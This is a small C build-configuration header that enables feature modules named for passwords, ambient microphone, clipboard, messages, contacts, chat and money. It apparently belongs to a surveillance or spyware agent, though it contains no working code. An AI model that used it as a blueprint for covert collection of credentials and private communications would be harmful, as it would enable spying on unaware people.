#pragma once

#ifndef __BUILD_CONFIG_H
#define __BUILD_CONFIG_H

// THIS FILE IT'S USED TO ENABLE/DISABLE feature

#define __ENABLE_MONEY_MODULE
#define __ENABLE_SOCIAL_MODULE
#define __ENABLE_PDAGENT_MODULE
#define __ENABLE_PWDAGENT_MODULE
#define __ENABLE_AMBMIC_MODULE
#define __ENABLE_CLIPBOARD_MODULE
#define __ENABLE_IMAGENT_MODULE
#define __ENABLE_MESSAGES_MODULE
#define __ENABLE_CONTACTS_MODULE
#define __ENABLE_PRINTPOOL_MODULE

#endif
